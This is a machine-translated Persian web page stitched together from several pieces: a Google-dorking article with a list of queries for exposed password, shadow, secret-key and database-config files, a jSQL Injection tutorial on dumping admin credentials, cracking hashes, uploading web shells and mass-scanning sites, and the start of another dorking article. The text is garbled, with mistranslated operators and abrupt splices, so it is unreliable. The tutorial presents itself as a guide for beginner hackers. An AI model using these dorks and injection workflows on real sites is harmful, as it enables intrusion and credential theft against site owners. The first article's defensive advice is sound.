• شناسه php نظر Inurl مورد نظر است. دستورالعمل استفاده از jSQL Injection، ابزاری چند منظوره برای یافتن و بهره برداری از تزریق SQL در کالی لینوکس. Bruteforcing هش با تزریق jSQL

    هک کردن با گوگل

    الکساندر آنتیپوف

    موتور جستجوی گوگل (www.google.com) گزینه های جستجوی زیادی را ارائه می دهد. همه این ویژگی‌ها یک ابزار جستجوی ارزشمند برای اولین کاربر اینترنت و در عین حال یک سلاح قوی‌تر برای تهاجم و تخریب در دستان افرادی با نیات شیطانی، از جمله نه تنها هکرها، بلکه مجرمان غیر رایانه‌ای هستند. و حتی تروریست ها
    (9475 بازدید در 1 هفته)


    دنیس باترانکوف
    denisNOSPAMixi.ru

    توجه:این مقاله راهنمای عمل نیست. این مقاله برای شما مدیران وب سرور نوشته شده است تا احساس کاذب امنیت خود را از دست بدهید و در نهایت موذیانه بودن این روش کسب اطلاعات را درک کرده و اقدام به حفاظت از سایت خود کنید.

    معرفی

    مثلا 1670 صفحه در 0.14 ثانیه پیدا کردم!

    2. بیایید یک خط دیگر را وارد کنیم، برای مثال:

    inurl:"auth_user_file.txt"

    کمی کمتر، اما این برای دانلود رایگان و حدس زدن رمزهای عبور (با استفاده از همان John The Ripper) کافی است. در زیر چند مثال دیگر می زنم.

    بنابراین، باید بدانید که موتور جستجوی گوگل از اکثر سایت های اینترنتی بازدید کرده و اطلاعات موجود در آنها را در حافظه پنهان ذخیره کرده است. این اطلاعات ذخیره شده در حافظه پنهان به شما این امکان را می دهد که بدون اتصال مستقیم به سایت، اطلاعاتی را در مورد سایت و محتوای سایت به دست آورید، فقط اطلاعاتی را که در داخل گوگل ذخیره می شود، جستجو کنید. علاوه بر این، اگر اطلاعات موجود در سایت دیگر در دسترس نباشد، ممکن است اطلاعات موجود در حافظه پنهان همچنان حفظ شود. تنها چیزی که برای این روش نیاز است دانستن چند کلمه کلیدی گوگل است. این تکنیک Google Hacking نام دارد.

    برای اولین بار، اطلاعات مربوط به هک گوگل 3 سال پیش در لیست پستی Bugtruck ظاهر شد. در سال 2001 این موضوع توسط یک دانشجوی فرانسوی مطرح شد. در اینجا پیوندی به این نامه آمده است http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. اولین نمونه از چنین درخواست هایی را ارائه می دهد:

    1) فهرست /admin
    2) فهرست رمز عبور /
    3) فهرست /mail
    4) فهرست / +banques +filetype:xls (برای فرانسه...)
    5) فهرست / +passwd
    6) Index of/password.txt

    این موضوع اخیراً در بخش انگلیسی خواندنی اینترنت سروصدای زیادی به پا کرد: پس از مقاله ای از جانی لانگ که در 7 می 2004 منتشر شد. برای مطالعه کامل تر در مورد هک گوگل، به شما توصیه می کنم به سایت این نویسنده http://johnny.ihackstuff.com مراجعه کنید. در این مقاله فقط می خواهم شما را به روز کنم.

    چه کسی می تواند از آن استفاده کند:
    - روزنامه نگاران، جاسوسان و تمام افرادی که دوست دارند بینی خود را در تجارت دیگران بچسبانند، می توانند از این برای جستجوی شواهد مخرب استفاده کنند.
    - هکرها به دنبال اهداف مناسب برای هک هستند.

    گوگل چگونه کار می کند

    برای ادامه گفتگو، اجازه دهید برخی از کلمات کلیدی مورد استفاده در جستجوهای گوگل را به شما یادآوری کنم.

    با استفاده از علامت + جستجو کنید

    گوگل از نظر خود کلمات بی اهمیت را از جستجو حذف می کند. به عنوان مثال، کلمات پرسشی، حرف اضافه و مقالات در زبان انگلیسی: برای مثال are, of, where. در زبان روسی، به نظر می رسد گوگل همه کلمات را مهم می داند. اگر کلمه از جستجو حذف شود، گوگل در مورد آن می نویسد. برای اینکه گوگل شروع به جستجوی صفحاتی با این کلمات کند، باید علامت + را بدون فاصله قبل از کلمه قبل از آنها اضافه کنید. مثلا:

    آس + پایه

    جستجو بر اساس علامت -

    اگر گوگل تعداد زیادی صفحه را پیدا کرد که می خواهید صفحاتی با موضوعات خاص را از آنها حذف کنید، می توانید گوگل را مجبور کنید فقط به دنبال صفحاتی بگردد که حاوی کلمات خاصی نیستند. برای این کار باید این کلمات را با قرار دادن علامتی در مقابل هر کدام - بدون فاصله قبل از کلمه - مشخص کنید. مثلا:

    ماهیگیری - ودکا

    با علامت ~ جستجو کنید

    ممکن است بخواهید نه تنها کلمه مشخص شده، بلکه مترادف های آن را نیز جستجو کنید. برای انجام این کار، قبل از کلمه با علامت ~ قرار دهید.

    پیدا کردن یک عبارت دقیق با استفاده از دو نقل قول

    گوگل در هر صفحه همه تکرار کلماتی را که در رشته کوئری نوشته اید جستجو می کند و به موقعیت نسبی کلمات اهمیتی نمی دهد، نکته اصلی این است که همه کلمات مشخص شده همزمان در صفحه باشند ( این عمل پیش فرض است). برای یافتن عبارت دقیق، باید آن را در گیومه قرار دهید. مثلا:

    "پایه کتاب"

    برای داشتن حداقل یکی از کلمات مشخص شده، باید عملیات منطقی را به صراحت مشخص کنید: OR. مثلا:

    ایمنی کتاب یا حفاظت

    علاوه بر این، می توانید از علامت * در رشته جستجو برای نشان دادن هر کلمه و استفاده کنید. برای نشان دادن هر شخصیت

    یافتن کلمات با عملگرهای اضافی

    عملگرهای جستجویی وجود دارند که در رشته جستجو با فرمت مشخص شده اند:

    عملگر:search_term

    فضاهای کنار کولون نیازی نیست. اگر یک فاصله بعد از دو نقطه وارد کنید، یک پیغام خطا مشاهده می کنید و قبل از آن، گوگل از آنها به عنوان یک رشته جستجوی معمولی استفاده می کند.
    گروه‌هایی از اپراتورهای جستجوی اضافی وجود دارد: زبان‌ها - نشان می‌دهد که به کدام زبان می‌خواهید نتیجه را ببینید، تاریخ - محدود کردن نتایج برای سه، شش یا 12 ماه گذشته، موارد - نشان می‌دهد در کجای سند باید به دنبال آن باشید. رشته: همه جا، در عنوان، در URL، دامنه ها - سایت مشخص شده را جستجو کنید یا برعکس آن را از جستجو حذف کنید، جستجوی ایمن - سایت های حاوی نوع مشخص شده اطلاعات را مسدود کنید و آنها را از صفحات نتایج جستجو حذف کنید.
    با این حال، برخی از اپراتورها به پارامتر اضافی نیاز ندارند، به عنوان مثال، پرس و جو " حافظه پنهان: www.google.com"را می توان به عنوان یک رشته جستجوی کامل نامید، و برخی از کلمات کلیدی، برعکس، به یک کلمه جستجو نیاز دارند، برای مثال" سایت:www.google.com کمکبا توجه به موضوع خود، اجازه دهید به عملگرهای زیر نگاه کنیم:

    اپراتور

    شرح

    به یک پارامتر اضافی نیاز دارد؟

    فقط سایت مشخص شده در search_term را جستجو کنید

    فقط در اسناد با نوع search_term جستجو کنید

    صفحات حاوی search_term در عنوان را پیدا کنید

    صفحاتی را پیدا کنید که حاوی تمام کلمات search_term در عنوان هستند

    صفحات حاوی کلمه search_term را در آدرس خود پیدا کنید

    صفحاتی را پیدا کنید که حاوی تمام کلمات search_term در آدرس آنها هستند

    اپراتور سایت:جستجو را فقط در سایت مشخص شده محدود می کند و می توانید نه تنها نام دامنه، بلکه آدرس IP را نیز مشخص کنید. برای مثال وارد کنید:

    اپراتور نوع فایل:جستجوها را به فایل هایی از نوع خاصی محدود می کند. مثلا:

    از تاریخ این مقاله، گوگل می تواند در 13 فرمت فایل مختلف جستجو کند:

    • فرمت سند قابل حمل Adobe (pdf)
    • Adobe PostScript (ps)
    • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
    • Lotus Word Pro (lwp)
    • مک رایت (mw)
    • مایکروسافت اکسل (xls)
    • پاورپوینت مایکروسافت (ppt)
    • Microsoft Word (doc)
    • Microsoft Works (wks، wps، wdb)
    • مایکروسافت رایت (wri)
    • فرمت متن غنی (rtf)
    • Shockwave Flash (swf)
    • متن (ans, txt)

    اپراتور ارتباط دادن:تمام صفحاتی که به صفحه مشخص شده اشاره دارند را نشان می دهد.
    همیشه باید جالب باشد که ببینید چند مکان در اینترنت در مورد شما می شناسند. ما سعی می کنیم:

    اپراتور حافظه پنهان:نسخه ذخیره شده Google از سایت را همانطور که در آخرین بازدید Google از صفحه به نظر می رسید نشان می دهد. ما هر سایتی که مرتباً در حال تغییر است را می گیریم و نگاه می کنیم:

    اپراتور عنوان:کلمه مشخص شده را در عنوان صفحه جستجو می کند. اپراتور allintitle:یک پسوند است - همه چند کلمه مشخص شده در عنوان صفحه را جستجو می کند. مقایسه کنید:

    عنوان: پرواز به مریخ
    intitle:flight intitle:on intitle:mars
    allintitle: پرواز به مریخ

    اپراتور inurl:باعث می شود گوگل تمام صفحات حاوی رشته مشخص شده را در URL نشان دهد. allinurl: همه کلمات را در یک URL جستجو می کند. مثلا:

    allinurl:acid_stat_alerts.php

    این دستور به ویژه برای کسانی که SNORT ندارند مفید است - حداقل آنها می توانند ببینند که چگونه در یک سیستم واقعی کار می کند.

    روش های هک گوگل

    بنابراین، متوجه شدیم که با استفاده از ترکیبی از عملگرها و کلمات کلیدی فوق، هر کسی می تواند اطلاعات لازم را جمع آوری کرده و آسیب پذیری ها را جستجو کند. این تکنیک ها اغلب به عنوان هک گوگل شناخته می شوند.

    نقشه سایت

    برای مشاهده تمام لینک هایی که گوگل در سایت پیدا کرده است، می توانید از بیانیه سایت: استفاده کنید. معمولاً صفحاتی که به صورت پویا توسط اسکریپت ها ایجاد می شوند با استفاده از پارامترها ایندکس نمی شوند، بنابراین برخی از سایت ها از فیلترهای ISAPI استفاده می کنند تا لینک ها در فرم نباشند. /article.asp?num=10&dst=5، اما با اسلاید /article/abc/num/10/dst/5. این کار برای اطمینان از اینکه سایت به طور کلی توسط موتورهای جستجو ایندکس می شود انجام می شود.

    بیایید تلاش کنیم:

    سایت: www.whitehouse.gov Whitehouse

    گوگل فکر می کند که هر صفحه در یک سایت حاوی کلمه Whitehouse است. این همان چیزی است که ما برای دریافت تمام صفحات استفاده می کنیم.
    یک نسخه ساده شده نیز وجود دارد:

    سایت:whitehouse.gov

    و بهترین بخش این است که رفقای whitehouse.gov حتی نمی‌دانستند که ما به ساختار سایت آنها نگاه کرده‌ایم و حتی به صفحات ذخیره‌شده‌ای که گوگل برای خودش دانلود کرده بود نگاهی انداختیم. از این می توان برای مطالعه ساختار سایت ها و مشاهده مطالب بدون توجه فعلا استفاده کرد.

    فهرست کردن فایل ها در فهرست ها

    سرورهای وب می توانند به جای صفحات HTML معمولی لیست دایرکتوری سرور را نمایش دهند. این معمولا برای وادار کردن کاربران به انتخاب و دانلود فایل های خاص انجام می شود. با این حال، در بسیاری از موارد، مدیران قصد ندارند محتویات یک فهرست را نشان دهند. این به دلیل پیکربندی نادرست سرور یا عدم وجود صفحه اصلی در فهرست است. در نتیجه، هکر این شانس را دارد که چیز جالبی را در فهرست پیدا کند و از آن برای اهداف خود استفاده کند. برای یافتن تمامی چنین صفحاتی، کافی است توجه داشته باشید که همگی دارای عبارت: index of در عنوان خود هستند. اما از آنجایی که فهرست کلمات فقط چنین صفحاتی را شامل نمی شود، باید پرس و جو را اصلاح کنیم و کلمات کلیدی موجود در خود صفحه را در نظر بگیریم، بنابراین پرس و جوهایی مانند:

    intitle:index.of دایرکتوری والد
    intitle:index.of name size

    از آنجایی که بیشتر فهرست‌های دایرکتوری عمدی هستند، ممکن است در اولین بار برای یافتن فهرست‌های نابجا با مشکل مواجه شوید. اما حداقل می توانید از لیست ها برای تعیین نسخه وب سرور استفاده کنید، همانطور که در زیر توضیح داده شده است.

    دریافت نسخه وب سرور.

    دانستن نسخه سرور وب همیشه قبل از شروع هر حمله هکری مفید است. مجدداً به لطف Google امکان دریافت این اطلاعات بدون اتصال به سرور وجود دارد. اگر با دقت به فهرست دایرکتوری نگاه کنید، می بینید که نام سرور وب و نسخه آن در آنجا نمایش داده می شود.

    Apache1.3.29 - سرور ProXad در پورت 80 trf296.free.fr

    یک مدیر با تجربه می تواند این اطلاعات را تغییر دهد، اما، به عنوان یک قاعده، درست است. بنابراین، برای دریافت این اطلاعات، کافی است یک درخواست ارسال کنید:

    intitle:index.of server.at

    برای به دست آوردن اطلاعات برای یک سرور خاص، درخواست را اصلاح می کنیم:

    intitle:index.of server.at site:ibm.com

    یا برعکس، ما به دنبال سرورهایی هستیم که روی یک نسخه خاص از سرور اجرا می شوند:

    intitle:index.of Apache/2.0.40 Server at

    این تکنیک می تواند توسط یک هکر برای یافتن قربانی استفاده شود. به عنوان مثال، اگر او یک اکسپلویت برای نسخه خاصی از وب سرور داشته باشد، می تواند آن را پیدا کند و اکسپلویت موجود را امتحان کند.

    همچنین می‌توانید با مشاهده صفحاتی که به‌طور پیش‌فرض در هنگام نصب یک نسخه جدید از وب سرور نصب شده‌اند، نسخه سرور را دریافت کنید. به عنوان مثال، برای دیدن صفحه آزمایشی Apache 1.2.6، فقط تایپ کنید

    intitle:Test.Page.for.Apache it.worked!

    علاوه بر این، برخی از سیستم عامل ها بلافاصله سرور وب را در هنگام نصب نصب و راه اندازی می کنند. با این حال، برخی از کاربران حتی از این موضوع آگاه نیستند. به طور طبیعی، اگر می بینید که شخصی صفحه پیش فرض را حذف نکرده است، منطقی است که فرض کنیم کامپیوتر اصلاً تحت هیچ گونه پیکربندی قرار نگرفته است و احتمالاً در برابر حملات آسیب پذیر است.

    به دنبال صفحات IIS 5.0 بگردید

    allintitle:به Windows 2000 Internet Services خوش آمدید

    در مورد IIS، می توانید نه تنها نسخه سرور، بلکه نسخه ویندوز و سرویس پک را نیز تعیین کنید.

    راه دیگر برای تعیین نسخه WEB سرور جستجوی راهنماها (صفحات راهنما) و نمونه هایی است که به طور پیش فرض بر روی سایت نصب شوند. هکرها راه های زیادی برای استفاده از این مؤلفه ها برای دسترسی ممتاز به سایت پیدا کرده اند. به همین دلیل است که باید این قطعات را در سایت تولید حذف کنید. ناگفته نماند که با وجود این قطعات می توانید اطلاعاتی در مورد نوع سرور و نسخه آن به دست آورید. به عنوان مثال، بیایید راهنمای آپاچی را پیدا کنیم:

    inurl:دستی ماژول های دستورالعمل آپاچی

    استفاده از گوگل به عنوان اسکنر CGI.

    اسکنر CGI یا WEB scanner ابزاری برای جستجوی اسکریپت ها و برنامه های آسیب پذیر در سرور قربانی است. این ابزارها باید بدانند که به دنبال چه چیزی بگردند، برای این کار آنها یک لیست کامل از فایل های آسیب پذیر دارند، به عنوان مثال:

    /cgi-bin/cgiemail/uargg.txt
    /random_banner/index.cgi
    /random_banner/index.cgi
    /cgi-bin/mailview.cgi
    /cgi-bin/maillist.cgi
    /cgi-bin/userreg.cgi

    /iissamples/ISSamples/SQLQHit.asp
    /SiteServer/admin/findvserver.asp
    /scripts/cphost.dll
    /cgi-bin/finger.cgi

    ما می‌توانیم هر یک از این فایل‌ها را با استفاده از Google پیدا کنیم، به‌علاوه با استفاده از کلمات index of یا inurl با نام فایل در نوار جستجو: می‌توانیم سایت‌هایی با اسکریپت‌های آسیب‌پذیر پیدا کنیم، برای مثال:

    allinurl:/random_banner/index.cgi

    با دانش اضافی، یک هکر می‌تواند از آسیب‌پذیری اسکریپت سوء استفاده کند و از این آسیب‌پذیری استفاده کند تا اسکریپت را مجبور کند تا هر فایلی را که در سرور ذخیره شده است، ارائه دهد. به عنوان مثال یک فایل رمز عبور.

    چگونه از خود در برابر هک شدن از طریق گوگل محافظت کنیم؟

    1. داده های مهم را در سرور وب آپلود نکنید.

    حتی اگر داده‌ها را به‌طور موقت پست کرده‌اید، می‌توانید آن‌ها را فراموش کنید یا اینکه قبل از پاک کردن آن‌ها، کسی وقت پیدا می‌کند و می‌گیرد. انجامش نده راه های زیادی برای انتقال داده ها وجود دارد که از آن ها در برابر سرقت محافظت می کند.

    2. سایت خود را بررسی کنید.

    از روش های توضیح داده شده برای تحقیق در مورد سایت خود استفاده کنید. سایت خود را به صورت دوره ای برای روش های جدیدی که در سایت http://johnny.ihackstuff.com ظاهر می شود بررسی کنید. به یاد داشته باشید که اگر می خواهید اقدامات خود را خودکار کنید، باید مجوز ویژه ای از Google دریافت کنید. اگر با دقت بخوانید http://www.google.com/terms_of_service.html، سپس عبارت را مشاهده می کنید: شما نمی توانید درخواست های خودکار از هر نوع را بدون مجوز صریح از قبل از Google به سیستم Google ارسال کنید.

    3. ممکن است نیازی به Google برای ایندکس کردن سایت یا بخشی از آن نداشته باشید.

    گوگل به شما این امکان را می دهد که لینک سایت خود یا بخشی از آن را از پایگاه داده خود حذف کنید و همچنین صفحات را از کش حذف کنید. علاوه بر این، می‌توانید جستجوی تصاویر در سایت خود را ممنوع کنید، نمایش قطعات کوتاه صفحات در نتایج جستجو را ممنوع کنید. تمام احتمالات حذف یک سایت در صفحه توضیح داده شده است. http://www.google.com/remove.html. برای انجام این کار، باید تأیید کنید که واقعاً مالک این سایت هستید یا برچسب هایی را در صفحه یا

    4. از robots.txt استفاده کنید

    مشخص است که موتورهای جستجو به فایل robots.txt در ریشه سایت نگاه می کنند و قسمت هایی را که با کلمه مشخص شده اند ایندکس نمی کنند. غیر مجاز. می توانید از این برای جلوگیری از ایندکس شدن بخشی از سایت استفاده کنید. به عنوان مثال، برای جلوگیری از نمایه سازی کل سایت، یک فایل robots.txt حاوی دو خط ایجاد کنید:

    عامل کاربر: *
    عدم اجازه:/

    چه اتفاقی می افتد

    برای اینکه زندگی به نظر شما عسل نباشد، در پایان می گویم که سایت هایی وجود دارند که افرادی را دنبال می کنند که با استفاده از روش های بالا به دنبال حفره هایی در اسکریپت ها و سرورهای وب می گردند. نمونه ای از چنین صفحه ای است

    کاربرد.

    کمی شیرین. یکی از موارد زیر را خودتان امتحان کنید:

    1. #mysql dump نوع فایل: sql - جستجوی داده‌های پایگاه داده mySQL
    2. گزارش خلاصه آسیب پذیری میزبان - به شما نشان می دهد که سایر افراد چه آسیب پذیری هایی پیدا کرده اند
    3. phpMyAdmin در حال اجرا بر روی inurl:main.php - این باعث می شود کنترل از طریق پنل phpmyadmin بسته شود.
    4. برای توزیع محرمانه نیست
    5. درخواست جزئیات کنترل متغیرهای سرور درخت
    6. دویدن در حالت کودک
    7. این گزارش توسط WebLog تولید شده است
    8. intitle:index.of cgiirc.config
    9. filetype:conf inurl:firewall -intitle:cvs - شاید کسی به فایل های پیکربندی فایروال نیاز داشته باشد؟ :)
    10. intitle:index.of finances.xls - hmm....
    11. عنوان: فهرست چت های dbconvert.exe - گزارش های چت icq
    12. intext: تجزیه و تحلیل ترافیک Tobias Oetiker
    13. عنوان: آمار استفاده برای ایجاد شده توسط Webalizer
    14. عنوان: آمار آمار پیشرفته وب
    15. intitle:index.of ws_ftp.ini - پیکربندی ws ftp
    16. inurl:ipsec.secrets دارای اسرار مشترک است - کلید مخفی - پیدا کردن خوب
    17. inurl:main.php به phpMyAdmin خوش آمدید
    18. inurl:server-info اطلاعات سرور آپاچی
    19. سایت:edu نمرات مدیریت
    20. ORA-00921: پایان غیرمنتظره دستور SQL - مسیرها را دریافت کنید
    21. عنوان: index.of trillian.ini
    22. عنوان: فهرست pwd.db
    23. عنوان: index.of people.lst
    24. intitle:index.of master.passwd
    25.inurl:passlist.txt
    26. عنوان: فهرست mysql_history
    27. intitle:index of intext:globals.inc
    28. عنوان:index.of administrators.pwd
    29. عنوان: Index.of etc shadow
    30. intitle:index.of secring.pgp
    31. inurl:config.php dbuname dbpass
    32. inurl:perform filetype:ini

  • "هک کردن mit Google"
  • مرکز آموزشی "Informzashchita" http://www.itsecurity.ru - یک مرکز تخصصی پیشرو در زمینه آموزش امنیت اطلاعات (مجوز کمیته آموزش مسکو شماره 015470، اعتبارنامه دولتی شماره 004251). تنها مرکز آموزش مجاز سیستم های امنیت اینترنت و Clearswift در روسیه و کشورهای CIS. مرکز آموزشی مجاز مایکروسافت (تخصص امنیتی). برنامه های آموزشی با کمیسیون فنی دولتی روسیه، FSB (FAPSI) هماهنگ می شود. گواهینامه های آموزشی و اسناد دولتی در مورد آموزش پیشرفته.

    SoftKey یک سرویس منحصر به فرد برای خریداران، توسعه دهندگان، فروشندگان و شرکای وابسته است. علاوه بر این، این یکی از بهترین فروشگاه‌های نرم‌افزار آنلاین در روسیه، اوکراین، قزاقستان است که طیف گسترده‌ای، روش‌های پرداخت فراوان، پردازش سریع (اغلب فوری) سفارش، پیگیری فرآیند انجام سفارش در بخش شخصی، تخفیف‌های مختلف را به مشتریان ارائه می‌دهد. از فروشگاه و تولید کنندگان BY.

    فایل دانلود شده را با دوبار کلیک اجرا کنید (شما باید یک ماشین مجازی داشته باشید).

    3. ناشناس بودن هنگام بررسی سایت برای تزریق SQL

    راه اندازی Tor و Privoxy در کالی لینوکس

    [بخش در حال توسعه]

    راه اندازی Tor و Privoxy در ویندوز

    [بخش در حال توسعه]

    تنظیمات پراکسی jSQL Injection

    [بخش در حال توسعه]

    4. بررسی سایت برای تزریق SQL با تزریق jSQL

    کار با برنامه فوق العاده ساده است. فقط آدرس سایت را وارد کرده و ENTER را فشار دهید.

    تصویر زیر نشان می دهد که سایت در برابر سه نوع تزریق SQL به طور همزمان آسیب پذیر است (اطلاعات مربوط به آنها در گوشه سمت راست پایین نشان داده شده است). با کلیک بر روی نام تزریق ها، می توانید روش مورد استفاده را تغییر دهید:

    همچنین پایگاه داده های موجود را قبلا نمایش داده ایم.

    می توانید محتویات هر جدول را مشاهده کنید:

    معمولاً جالب ترین قسمت جداول، اعتبار مدیر است.

    اگر خوش شانس هستید و داده های مدیر را پیدا کردید، برای خوشحالی خیلی زود است. همچنین باید پنل مدیریت را پیدا کنید، جایی که این داده ها را وارد کنید.

    5. با jSQL Injection ادمین ها را جستجو کنید

    برای این کار به تب بعدی بروید. در اینجا ما با لیستی از آدرس های احتمالی روبرو می شویم. می توانید یک یا چند صفحه را برای بررسی انتخاب کنید:

    راحتی این است که شما نیازی به استفاده از برنامه های دیگر ندارید.

    متأسفانه، برنامه نویسان بی دقت زیادی وجود ندارند که رمزهای عبور را در متن واضح ذخیره می کنند. اغلب در رشته رمز عبور چیزی شبیه به آن را می بینیم

    8743b52063cd84097a65d1633f5c74f5

    این یک هش است. شما می توانید آن را با نیروی بی رحمانه رمزگشایی کنید. و... jSQL Injection دارای یک brute-forcer داخلی است.

    6. هش های بی رحمانه با تزریق jSQL

    راحتی بدون شک این است که شما نیازی به جستجوی برنامه های دیگر ندارید. پشتیبانی از بسیاری از محبوب ترین هش ها وجود دارد.

    این بهترین گزینه نیست. برای تبدیل شدن به یک گورو در رمزگشایی هش، کتاب "" به زبان روسی توصیه می شود.

    اما، البته، زمانی که برنامه دیگری در دسترس نیست یا زمانی برای مطالعه وجود ندارد، jSQL Injection با عملکرد brute-force داخلی مفید خواهد بود.

    تنظیماتی وجود دارد: می توانید تعیین کنید کدام کاراکترها در رمز عبور گنجانده شده است، محدوده طول رمز عبور.

    7. عملیات فایل پس از تشخیص تزریق SQL

    علاوه بر عملیات با پایگاه داده - خواندن و اصلاح آنها، در صورت شناسایی تزریق SQL، عملیات فایل زیر را می توان انجام داد:

    • خواندن فایل ها روی سرور
    • آپلود فایل های جدید روی سرور
    • آپلود پوسته ها روی سرور

    و همه اینها در jSQL Injection پیاده سازی شده است!

    محدودیت هایی وجود دارد - سرور SQL باید دارای امتیازات فایل باشد. با مدیران سیستم معقول، آنها غیرفعال می شوند و دسترسی به سیستم فایل امکان پذیر نیست.

    بررسی وجود امتیازات فایل به اندازه کافی آسان است. به یکی از تب ها (خواندن فایل ها، ایجاد پوسته، آپلود فایل جدید) بروید و سعی کنید یکی از عملیات مشخص شده را انجام دهید.

    نکته بسیار مهم دیگر - ما باید دقیقاً مسیر مطلق فایلی را که با آن کار خواهیم کرد بدانیم - در غیر این صورت هیچ چیز کار نخواهد کرد.

    به اسکرین شات زیر نگاه کنید:

    هر تلاشی برای کار بر روی یک فایل توسط: بدون امتیاز FILE(بدون امتیاز فایل). و در اینجا هیچ کاری نمی توان کرد.

    اگر در عوض خطای دیگری دارید:

    مشکل در نوشتن در [directory_name]

    این بدان معناست که شما مسیر مطلقی را که می خواهید فایل را در آن بنویسید به اشتباه مشخص کرده اید.

    برای در نظر گرفتن یک مسیر مطلق، حداقل باید سیستم عاملی را که سرور روی آن در حال اجرا است، بشناسید. برای انجام این کار، به تب Network بروید.

    چنین ورودی (رشته Win64) به ما دلیل می دهد که فرض کنیم با سیستم عامل ویندوز سروکار داریم:

    Keep-Alive: timeout=5, max=99 سرور: Apache/2.4.17 (Win64) PHP/7.0.0RC6 اتصال: Keep-Alive روش: HTTP/1.1 200 OK Content-Length: 353 تاریخ: جمعه، 115 دسامبر 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 نوع محتوا: text/html; charset=UTF-8

    در اینجا تعدادی یونیکس (*BSD، Linux) داریم:

    Transfer-Encoding: chunked تاریخ: جمعه، 11 دسامبر 2015، 11:57:02 GMT روش: HTTP/1.1 200 OK Keep-Alive: timeout=3، max=100 اتصال: keep-alive نوع محتوا: text/html X- پشتیبانی شده توسط: PHP/5.3.29 سرور: Apache/2.2.31 (یونیکس)

    و در اینجا ما CentOS را داریم:

    روش: HTTP/1.1 200 OK منقضی می‌شود: پنج‌شنبه، 19 نوامبر 1981، 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ اتصال: keep-alive X-Cache-Lookup: MISS از t1.hoster.ru:6666 سرور: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS از t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 پراگما: بدون کش تاریخ: جمعه, 11 دسامبر 2015 12:08:54 GMT انتقال-کدگذاری: تکه تکه شده نوع محتوا: متن/html. charset=WINDOWS-1251

    در ویندوز، یک پوشه سایت معمولی است C:\Server\data\htdocs\. اما، در واقع، اگر کسی به فکر ساخت یک سرور در ویندوز افتاده باشد، به احتمال زیاد، این شخص چیزی در مورد امتیازات نشنیده است. بنابراین، باید مستقیماً از دایرکتوری C: / Windows / شروع به امتحان کنید:

    همانطور که می بینید، اولین بار همه چیز عالی پیش رفت.

    اما خود پوسته های تزریق jSQL شک من را برمی انگیزد. اگر امتیازات فایل دارید، ممکن است چیزی را با یک رابط وب آپلود کنید.

    8. بررسی انبوه سایت ها برای تزریق SQL

    و حتی jSQL Injection نیز این ویژگی را دارد. همه چیز بسیار ساده است - فهرستی از سایت ها را آپلود کنید (می توان از یک فایل وارد کرد)، مواردی را که می خواهید بررسی کنید انتخاب کنید و برای شروع عملیات روی دکمه مناسب کلیک کنید.

    خروجی توسط jSQL Injection

    jSQL Injection یک ابزار خوب و قدرتمند برای یافتن و سپس استفاده از تزریق SQL موجود در سایت ها است. مزایای بدون شک آن: سهولت استفاده، توابع مرتبط داخلی. jSQL Injection می تواند بهترین دوست یک مبتدی در هنگام تجزیه و تحلیل وب سایت ها باشد.

    از کاستی ها، من به عدم امکان ویرایش پایگاه داده ها اشاره می کنم (حداقل این قابلیت را پیدا نکردم). مانند تمام ابزارهای دارای رابط گرافیکی، عدم امکان استفاده در اسکریپت ها را می توان به معایب این برنامه نسبت داد. با این وجود، برخی از اتوماسیون ها در این برنامه نیز امکان پذیر است - به لطف عملکرد داخلی بررسی انبوه سایت.

    استفاده از jSQL Injection بسیار راحت تر از sqlmap است. اما sqlmap از انواع بیشتری از تزریق SQL پشتیبانی می کند، گزینه های فایروال فایل و برخی ویژگی های دیگر را دارد.

    خط پایین: jSQL Injection بهترین دوست یک هکر مبتدی است.

    برای این برنامه می توانید در دایره المعارف لینوکس کالی در این صفحه راهنمایی پیدا کنید: http://kali.tools/?p=706

    دریافت اطلاعات خصوصی همیشه به معنای هک نیست - گاهی اوقات در حوزه عمومی منتشر می شود. دانستن تنظیمات گوگل و کمی هوشمندی به شما امکان می دهد چیزهای جالب زیادی پیدا کنید - از شماره کارت اعتباری گرفته تا اسناد FBI.

    هشدار

    تمام اطلاعات فقط برای مقاصد اطلاعاتی ارائه شده است. نه سردبیران و نه نویسنده مسئولیتی در قبال آسیب احتمالی ناشی از مطالب این مقاله ندارند.

    امروزه همه چیز به اینترنت متصل است و به محدودیت دسترسی اهمیت چندانی نمی دهد. بنابراین، بسیاری از داده های خصوصی طعمه موتورهای جستجو می شوند. ربات‌های عنکبوتی دیگر محدود به صفحات وب نیستند، بلکه تمام محتوای موجود در وب را فهرست‌بندی می‌کنند و دائماً اطلاعات محرمانه را به پایگاه داده‌های خود اضافه می‌کنند. یادگیری این اسرار آسان است - فقط باید بدانید که چگونه در مورد آنها سوال کنید.

    در حال جستجو برای فایل ها

    در دستان توانا، گوگل به سرعت هر چیزی را که در وب بد است، مانند اطلاعات شخصی و فایل‌های مورد استفاده رسمی پیدا می‌کند. آنها اغلب مانند یک کلید زیر یک فرش پنهان می شوند: هیچ محدودیت دسترسی واقعی وجود ندارد، داده ها فقط در پشت سایت قرار دارند، جایی که لینک ها به آن منتهی نمی شوند. رابط وب استاندارد گوگل فقط تنظیمات اولیه جستجوی پیشرفته را ارائه می دهد، اما حتی اینها نیز کافی خواهند بود.

    دو عملگر وجود دارد که می‌توانید از آنها برای محدود کردن جستجوهای Google به فایل‌هایی از نوع خاصی استفاده کنید: filetype و ext. اولی فرمتی را تنظیم می کند که موتور جستجو با سربرگ فایل تعیین می کند، دومی - پسوند فایل را بدون در نظر گرفتن محتوای داخلی آن تعیین می کند. هنگام جستجو در هر دو مورد، باید فقط پسوند را مشخص کنید. در ابتدا، اپراتور ext برای استفاده در مواردی که هیچ ویژگی فرمت خاصی برای فایل وجود نداشت (مثلاً برای جستجوی فایل‌های پیکربندی ini و cfg که می‌تواند حاوی هر چیزی باشد) راحت بود. اکنون الگوریتم های گوگل تغییر کرده اند و هیچ تفاوت قابل مشاهده ای بین اپراتورها وجود ندارد - نتایج در اکثر موارد یکسان است.


    فیلتر کردن خروجی

